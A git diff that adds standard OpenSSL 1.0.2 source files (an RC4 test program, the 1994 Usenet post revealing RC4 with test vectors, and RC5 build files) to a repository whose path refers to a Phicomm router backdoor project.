+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include "../e_os.h"
+
+#ifdef OPENSSL_NO_RC4
+int main(int argc, char *argv[])
+{
+    printf("No RC4 support\n");
+    return (0);
+}
+#else
+# include <openssl/rc4.h>
+# include <openssl/sha.h>
+
+static unsigned char keys[7][30] = {
+    {8, 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef},
+    {8, 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef},
+    {8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00},
+    {4, 0xef, 0x01, 0x23, 0x45},
+    {8, 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef},
+    {4, 0xef, 0x01, 0x23, 0x45},
+};
+
+static unsigned char data_len[7] = { 8, 8, 8, 20, 28, 10 };
+
+static unsigned char data[7][30] = {
+    {0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0xff},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+     0x00, 0x00, 0x00, 0x00, 0xff},
+    {0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0,
+     0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0,
+     0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0,
+     0x12, 0x34, 0x56, 0x78, 0xff},
+    {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff},
+    {0},
+};
+
+static unsigned char output[7][30] = {
+    {0x75, 0xb7, 0x87, 0x80, 0x99, 0xe0, 0xc5, 0x96, 0x00},
+    {0x74, 0x94, 0xc2, 0xe7, 0x10, 0x4b, 0x08, 0x79, 0x00},
+    {0xde, 0x18, 0x89, 0x41, 0xa3, 0x37, 0x5d, 0x3a, 0x00},
+    {0xd6, 0xa1, 0x41, 0xa7, 0xec, 0x3c, 0x38, 0xdf,
+     0xbd, 0x61, 0x5a, 0x11, 0x62, 0xe1, 0xc7, 0xba,
+     0x36, 0xb6, 0x78, 0x58, 0x00},
+    {0x66, 0xa0, 0x94, 0x9f, 0x8a, 0xf7, 0xd6, 0x89,
+     0x1f, 0x7f, 0x83, 0x2b, 0xa8, 0x33, 0xc0, 0x0c,
+     0x89, 0x2e, 0xbe, 0x30, 0x14, 0x3c, 0xe2, 0x87,
+     0x40, 0x01, 0x1e, 0xcf, 0x00},
+    {0xd6, 0xa1, 0x41, 0xa7, 0xec, 0x3c, 0x38, 0xdf, 0xbd, 0x61, 0x00},
+    {0},
+};
+
+int main(int argc, char *argv[])
+{
+    int i, err = 0;
+    int j;
+    unsigned char *p;
+    RC4_KEY key;
+    unsigned char obuf[512];
+
+# if !defined(OPENSSL_PIC)
+    void OPENSSL_cpuid_setup(void);
+
+    OPENSSL_cpuid_setup();
+# endif
+
+    for (i = 0; i < 6; i++) {
+        RC4_set_key(&key, keys[i][0], &(keys[i][1]));
+        memset(obuf, 0x00, sizeof(obuf));
+        RC4(&key, data_len[i], &(data[i][0]), obuf);
+        if (memcmp(obuf, output[i], data_len[i] + 1) != 0) {
+            printf("error calculating RC4\n");
+            printf("output:");
+            for (j = 0; j < data_len[i] + 1; j++)
+                printf(" %02x", obuf[j]);
+            printf("\n");
+            printf("expect:");
+            p = &(output[i][0]);
+            for (j = 0; j < data_len[i] + 1; j++)
+                printf(" %02x", *(p++));
+            printf("\n");
+            err++;
+        } else
+            printf("test %d ok\n", i);
+    }
+    printf("test end processing ");
+    for (i = 0; i < data_len[3]; i++) {
+        RC4_set_key(&key, keys[3][0], &(keys[3][1]));
+        memset(obuf, 0x00, sizeof(obuf));
+        RC4(&key, i, &(data[3][0]), obuf);
+        if ((memcmp(obuf, output[3], i) != 0) || (obuf[i] != 0)) {
+            printf("error in RC4 length processing\n");
+            printf("output:");
+            for (j = 0; j < i + 1; j++)
+                printf(" %02x", obuf[j]);
+            printf("\n");
+            printf("expect:");
+            p = &(output[3][0]);
+            for (j = 0; j < i; j++)
+                printf(" %02x", *(p++));
+            printf(" 00\n");
+            err++;
+        } else {
+            printf(".");
+            fflush(stdout);
+        }
+    }
+    printf("done\n");
+    printf("test multi-call ");
+    for (i = 0; i < data_len[3]; i++) {
+        RC4_set_key(&key, keys[3][0], &(keys[3][1]));
+        memset(obuf, 0x00, sizeof(obuf));
+        RC4(&key, i, &(data[3][0]), obuf);
+        RC4(&key, data_len[3] - i, &(data[3][i]), &(obuf[i]));
+        if (memcmp(obuf, output[3], data_len[3] + 1) != 0) {
+            printf("error in RC4 multi-call processing\n");
+            printf("output:");
+            for (j = 0; j < data_len[3] + 1; j++)
+                printf(" %02x", obuf[j]);
+            printf("\n");
+            printf("expect:");
+            p = &(output[3][0]);
+            for (j = 0; j < data_len[3] + 1; j++)
+                printf(" %02x", *(p++));
+            err++;
+        } else {
+            printf(".");
+            fflush(stdout);
+        }
+    }
+    printf("done\n");
+    printf("bulk test ");
+    {
+        unsigned char buf[513];
+        SHA_CTX c;
+        unsigned char md[SHA_DIGEST_LENGTH];
+        static unsigned char expected[] = {
+            0xa4, 0x7b, 0xcc, 0x00, 0x3d, 0xd0, 0xbd, 0xe1, 0xac, 0x5f,
+            0x12, 0x1e, 0x45, 0xbc, 0xfb, 0x1a, 0xa1, 0xf2, 0x7f, 0xc5
+        };
+
+        RC4_set_key(&key, keys[0][0], &(keys[3][1]));
+        memset(buf, '\0', sizeof(buf));
+        SHA1_Init(&c);
+        for (i = 0; i < 2571; i++) {
+            RC4(&key, sizeof(buf), buf, buf);
+            SHA1_Update(&c, buf, sizeof(buf));
+        }
+        SHA1_Final(md, &c);
+
+        if (memcmp(md, expected, sizeof(md))) {
+            printf("error in RC4 bulk test\n");
+            printf("output:");
+            for (j = 0; j < (int)sizeof(md); j++)
+                printf(" %02x", md[j]);
+            printf("\n");
+            printf("expect:");
+            for (j = 0; j < (int)sizeof(md); j++)
+                printf(" %02x", expected[j]);
+            printf("\n");
+            err++;
+        } else
+            printf("ok\n");
+    }
+# ifdef OPENSSL_SYS_NETWARE
+    if (err)
+        printf("ERROR: %d\n", err);
+# endif
+    EXIT(err);
+    return (0);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rrc4.doc b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rrc4.doc
new file mode 100644
index 0000000..2f9a953
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/rrc4.doc
@@ -0,0 +1,278 @@
+Newsgroups: sci.crypt,alt.security,comp.security.misc,alt.privacy
+Path: ghost.dsi.unimi.it!univ-lyon1.fr!jussieu.fr!zaphod.crihan.fr!warwick!clyde.open.ac.uk!strath-cs!bnr.co.uk!bt!pipex!howland.reston.ans.net!europa.eng.gtefsd.com!MathWorks.Com!yeshua.marcam.com!charnel.ecst.csuchico.edu!csusac!csus.edu!netcom.com!sterndark
+From: sterndark@netcom.com (David Sterndark)
+Subject: RC4 Algorithm revealed.
+Message-ID: <sternCvKL4B.Hyy@netcom.com>
+Sender: sterndark@netcom.com 
+Organization: NETCOM On-line Communication Services (408 261-4700 guest)
+X-Newsreader: TIN [version 1.2 PL1]
+Date: Wed, 14 Sep 1994 06:35:31 GMT
+Lines: 263
+Xref: ghost.dsi.unimi.it sci.crypt:27332 alt.security:14732 comp.security.misc:11701 alt.privacy:16026
+
+I am shocked,  shocked, I tell you,  shocked, to discover
+that the cypherpunks have illegaly and criminally revealed
+a crucial RSA trade secret and harmed the security of
+America by reverse engineering the RC4 algorithm and
+publishing it to the world.
+ 
+On Saturday morning an anonymous cypherpunk wrote:
+ 
+ 
+   SUBJECT:  RC4 Source Code
+ 
+ 
+   I've tested this.  It is compatible with the RC4 object module
+   that comes in the various RSA toolkits.  
+ 
+   /* rc4.h */
+   typedef struct rc4_key
+   {      
+        unsigned char state[256];       
+        unsigned char x;        
+        unsigned char y;
+   } rc4_key;
+   void prepare_key(unsigned char *key_data_ptr,int key_data_len,
+   rc4_key *key);
+   void rc4(unsigned char *buffer_ptr,int buffer_len,rc4_key * key);
+   
+   
+   /*rc4.c */
+   #include "rc4.h"
+   static void swap_byte(unsigned char *a, unsigned char *b);
+   void prepare_key(unsigned char *key_data_ptr, int key_data_len,
+   rc4_key *key)
+   {
+        unsigned char swapByte;
+        unsigned char index1;
+        unsigned char index2;
+        unsigned char* state;
+        short counter;     
+        
+        state = &key->state[0];         
+        for(counter = 0; counter < 256; counter++)              
+        state[counter] = counter;               
+        key->x = 0;     
+        key->y = 0;     
+        index1 = 0;     
+        index2 = 0;             
+        for(counter = 0; counter < 256; counter++)      
+        {               
+             index2 = (key_data_ptr[index1] + state[counter] +
+                index2) % 256;                
+             swap_byte(&state[counter], &state[index2]);            
+   
+             index1 = (index1 + 1) % key_data_len;  
+        }       
+    }
+    
+    void rc4(unsigned char *buffer_ptr, int buffer_len, rc4_key *key)
+    { 
+        unsigned char x;
+        unsigned char y;
+        unsigned char* state;
+        unsigned char xorIndex;
+        short counter;              
+        
+        x = key->x;     
+        y = key->y;     
+        
+        state = &key->state[0];         
+        for(counter = 0; counter < buffer_len; counter ++)      
+        {               
+             x = (x + 1) % 256;                      
+             y = (state[x] + y) % 256;               
+             swap_byte(&state[x], &state[y]);                        
+                  
+             xorIndex = (state[x] + state[y]) % 256;                 
+                  
+             buffer_ptr[counter] ^= state[xorIndex];         
+         }               
+         key->x = x;     
+         key->y = y;
+    }
+    
+    static void swap_byte(unsigned char *a, unsigned char *b)
+    {
+        unsigned char swapByte; 
+        
+        swapByte = *a; 
+        *a = *b;      
+        *b = swapByte;
+    }
+ 
+ 
+ 
+Another cypherpunk, this one not anonymous, tested the
+output from this algorithm against the output from
+official RC4 object code
+ 
+ 
+   Date: Tue, 13 Sep 94 18:37:56 PDT
+   From: ekr@eit.COM (Eric Rescorla)
+   Message-Id: <9409140137.AA17743@eitech.eit.com>
+   Subject: RC4 compatibility testing
+   Cc: cypherpunks@toad.com
+   
+   One data point:
+   
+   I can't say anything about the internals of RC4 versus the
+   algorithm that Bill Sommerfeld is rightly calling 'Alleged RC4',
+   since I don't know anything about RC4's internals. 
+   
+   However, I do have a (legitimately acquired) copy of BSAFE2 and
+   so I'm able to compare the output of this algorithm to the output
+   of genuine RC4 as found in BSAFE. I chose a set of test vectors
+   and ran them through both algorithms. The algorithms appear to
+   give identical results, at least with these key/plaintext pairs.
+   
+   I note that this is the algorithm _without_ Hal Finney's
+   proposed modification
+   
+   (see <199409130605.XAA24133@jobe.shell.portal.com>).
+   
+   The vectors I used (together with the ciphertext they produce)
+   follow at the end of this message.
+   
+   -Ekr
+   
+   Disclaimer: This posting does not reflect the opinions of EIT.
+   
+   --------------------results follow--------------
+   Test vector 0
+   Key: 0x01 0x23 0x45 0x67 0x89 0xab 0xcd 0xef 
+   Input: 0x01 0x23 0x45 0x67 0x89 0xab 0xcd 0xef 
+   0 Output: 0x75 0xb7 0x87 0x80 0x99 0xe0 0xc5 0x96 
+   
+   Test vector 1
+   Key: 0x01 0x23 0x45 0x67 0x89 0xab 0xcd 0xef 
+   Input: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 
+   0 Output: 0x74 0x94 0xc2 0xe7 0x10 0x4b 0x08 0x79 
+   
+   Test vector 2
+   Key: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 
+   Input: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 
+   0 Output: 0xde 0x18 0x89 0x41 0xa3 0x37 0x5d 0x3a 
+   
+   Test vector 3
+   Key: 0xef 0x01 0x23 0x45 
+   Input: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 
+   0 Output: 0xd6 0xa1 0x41 0xa7 0xec 0x3c 0x38 0xdf 0xbd 0x61 
+   
+   Test vector 4
+   Key: 0x01 0x23 0x45 0x67 0x89 0xab 0xcd 0xef 
+   Input: 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 0x01 
+   0x01 
+   0 Output: 0x75 0x95 0xc3 0xe6 0x11 0x4a 0x09 0x78 0x0c 0x4a 0xd4 
+   0x52 0x33 0x8e 0x1f 0xfd 0x9a 0x1b 0xe9 0x49 0x8f 
+   0x81 0x3d 0x76 0x53 0x34 0x49 0xb6 0x77 0x8d 0xca 
+   0xd8 0xc7 0x8a 0x8d 0x2b 0xa9 0xac 0x66 0x08 0x5d 
+   0x0e 0x53 0xd5 0x9c 0x26 0xc2 0xd1 0xc4 0x90 0xc1 
+   0xeb 0xbe 0x0c 0xe6 0x6d 0x1b 0x6b 0x1b 0x13 0xb6 
+   0xb9 0x19 0xb8 0x47 0xc2 0x5a 0x91 0x44 0x7a 0x95 
+   0xe7 0x5e 0x4e 0xf1 0x67 0x79 0xcd 0xe8 0xbf 0x0a 
+   0x95 0x85 0x0e 0x32 0xaf 0x96 0x89 0x44 0x4f 0xd3 
+   0x77 0x10 0x8f 0x98 0xfd 0xcb 0xd4 0xe7 0x26 0x56 
+   0x75 0x00 0x99 0x0b 0xcc 0x7e 0x0c 0xa3 0xc4 0xaa 
+   0xa3 0x04 0xa3 0x87 0xd2 0x0f 0x3b 0x8f 0xbb 0xcd 
+   0x42 0xa1 0xbd 0x31 0x1d 0x7a 0x43 0x03 0xdd 0xa5 
+   0xab 0x07 0x88 0x96 0xae 0x80 0xc1 0x8b 0x0a 0xf6 
+   0x6d 0xff 0x31 0x96 0x16 0xeb 0x78 0x4e 0x49 0x5a 
+   0xd2 0xce 0x90 0xd7 0xf7 0x72 0xa8 0x17 0x47 0xb6 
+   0x5f 0x62 0x09 0x3b 0x1e 0x0d 0xb9 0xe5 0xba 0x53 
+   0x2f 0xaf 0xec 0x47 0x50 0x83 0x23 0xe6 0x71 0x32 
+   0x7d 0xf9 0x44 0x44 0x32 0xcb 0x73 0x67 0xce 0xc8 
+   0x2f 0x5d 0x44 0xc0 0xd0 0x0b 0x67 0xd6 0x50 0xa0 
+   0x75 0xcd 0x4b 0x70 0xde 0xdd 0x77 0xeb 0x9b 0x10 
+   0x23 0x1b 0x6b 0x5b 0x74 0x13 0x47 0x39 0x6d 0x62 
+   0x89 0x74 0x21 0xd4 0x3d 0xf9 0xb4 0x2e 0x44 0x6e 
+   0x35 0x8e 0x9c 0x11 0xa9 0xb2 0x18 0x4e 0xcb 0xef 
+   0x0c 0xd8 0xe7 0xa8 0x77 0xef 0x96 0x8f 0x13 0x90 
+   0xec 0x9b 0x3d 0x35 0xa5 0x58 0x5c 0xb0 0x09 0x29 
+   0x0e 0x2f 0xcd 0xe7 0xb5 0xec 0x66 0xd9 0x08 0x4b 
+   0xe4 0x40 0x55 0xa6 0x19 0xd9 0xdd 0x7f 0xc3 0x16 
+   0x6f 0x94 0x87 0xf7 0xcb 0x27 0x29 0x12 0x42 0x64 
+   0x45 0x99 0x85 0x14 0xc1 0x5d 0x53 0xa1 0x8c 0x86 
+   0x4c 0xe3 0xa2 0xb7 0x55 0x57 0x93 0x98 0x81 0x26 
+   0x52 0x0e 0xac 0xf2 0xe3 0x06 0x6e 0x23 0x0c 0x91 
+   0xbe 0xe4 0xdd 0x53 0x04 0xf5 0xfd 0x04 0x05 0xb3 
+   0x5b 0xd9 0x9c 0x73 0x13 0x5d 0x3d 0x9b 0xc3 0x35 
+   0xee 0x04 0x9e 0xf6 0x9b 0x38 0x67 0xbf 0x2d 0x7b 
+   0xd1 0xea 0xa5 0x95 0xd8 0xbf 0xc0 0x06 0x6f 0xf8 
+   0xd3 0x15 0x09 0xeb 0x0c 0x6c 0xaa 0x00 0x6c 0x80 
+   0x7a 0x62 0x3e 0xf8 0x4c 0x3d 0x33 0xc1 0x95 0xd2 
+   0x3e 0xe3 0x20 0xc4 0x0d 0xe0 0x55 0x81 0x57 0xc8 
+   0x22 0xd4 0xb8 0xc5 0x69 0xd8 0x49 0xae 0xd5 0x9d 
+   0x4e 0x0f 0xd7 0xf3 0x79 0x58 0x6b 0x4b 0x7f 0xf6 
+   0x84 0xed 0x6a 0x18 0x9f 0x74 0x86 0xd4 0x9b 0x9c 
+   0x4b 0xad 0x9b 0xa2 0x4b 0x96 0xab 0xf9 0x24 0x37 
+   0x2c 0x8a 0x8f 0xff 0xb1 0x0d 0x55 0x35 0x49 0x00 
+   0xa7 0x7a 0x3d 0xb5 0xf2 0x05 0xe1 0xb9 0x9f 0xcd 
+   0x86 0x60 0x86 0x3a 0x15 0x9a 0xd4 0xab 0xe4 0x0f 
+   0xa4 0x89 0x34 0x16 0x3d 0xdd 0xe5 0x42 0xa6 0x58 
+   0x55 0x40 0xfd 0x68 0x3c 0xbf 0xd8 0xc0 0x0f 0x12 
+   0x12 0x9a 0x28 0x4d 0xea 0xcc 0x4c 0xde 0xfe 0x58 
+   0xbe 0x71 0x37 0x54 0x1c 0x04 0x71 0x26 0xc8 0xd4 
+   0x9e 0x27 0x55 0xab 0x18 0x1a 0xb7 0xe9 0x40 0xb0 
+   0xc0 
+   
+
+
+-- 
+ ---------------------------------------------------------------------
+We have the right to defend ourselves and our
+property, because of the kind of animals that we              James A. Donald
+are.  True law derives from this right, not from
+the arbitrary power of the omnipotent state.                jamesd@netcom.com
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/Makefile
new file mode 100644
index 0000000..8a8b00e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/Makefile
@@ -0,0 +1,94 @@
+#
+# OpenSSL/crypto/rc5/Makefile
+#
+
+DIR=	rc5
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+RC5_ENC=		rc5_enc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+TEST=rc5test.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=rc5_skey.c rc5_ecb.c rc5_enc.c rc5cfb64.c rc5ofb64.c 
+LIBOBJ=rc5_skey.o rc5_ecb.o $(RC5_ENC) rc5cfb64.o rc5ofb64.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= rc5.h
+HEADER=	rc5_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+rc5-586.s: asm/rc5-586.pl ../perlasm/x86asm.pl ../perlasm/cbc.pl
+	$(PERL) asm/rc5-586.pl $(PERLASM_SCHEME) $(CFLAGS) > $@
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+rc5_ecb.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+rc5_ecb.o: ../../include/openssl/rc5.h rc5_ecb.c rc5_locl.h
+rc5_enc.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc5.h
+rc5_enc.o: rc5_enc.c rc5_locl.h
+rc5_skey.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc5.h
+rc5_skey.o: rc5_locl.h rc5_skey.c
+rc5cfb64.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc5.h
+rc5cfb64.o: rc5_locl.h rc5cfb64.c
+rc5ofb64.o: ../../include/openssl/opensslconf.h ../../include/openssl/rc5.h
+rc5ofb64.o: rc5_locl.h rc5ofb64.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/asm/rc5-586.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/asm/rc5-586.pl
new file mode 100644
index 0000000..61ac6ef
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc5/asm/rc5-586.pl
@@ -0,0 +1,110 @@
+#!/usr/local/bin/perl
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+push(@INC,"${dir}","${dir}../../perlasm");
+require "x86asm.pl";
+require "cbc.pl";
+
+&asm_init($ARGV[0],"rc5-586.pl");
+
+$RC5_MAX_ROUNDS=16;
+$RC5_32_OFF=($RC5_MAX_ROUNDS+2)*4;
+$A="edi";
+$B="esi";
+$S="ebp";
+$tmp1="eax";
+$r="ebx";
+$tmpc="ecx";
+$tmp4="edx";
+
+&RC5_32_encrypt("RC5_32_encrypt",1);
+&RC5_32_encrypt("RC5_32_decrypt",0);
+&cbc("RC5_32_cbc_encrypt","RC5_32_encrypt","RC5_32_decrypt",0,4,5,3,-1,-1);
+&asm_finish();
+
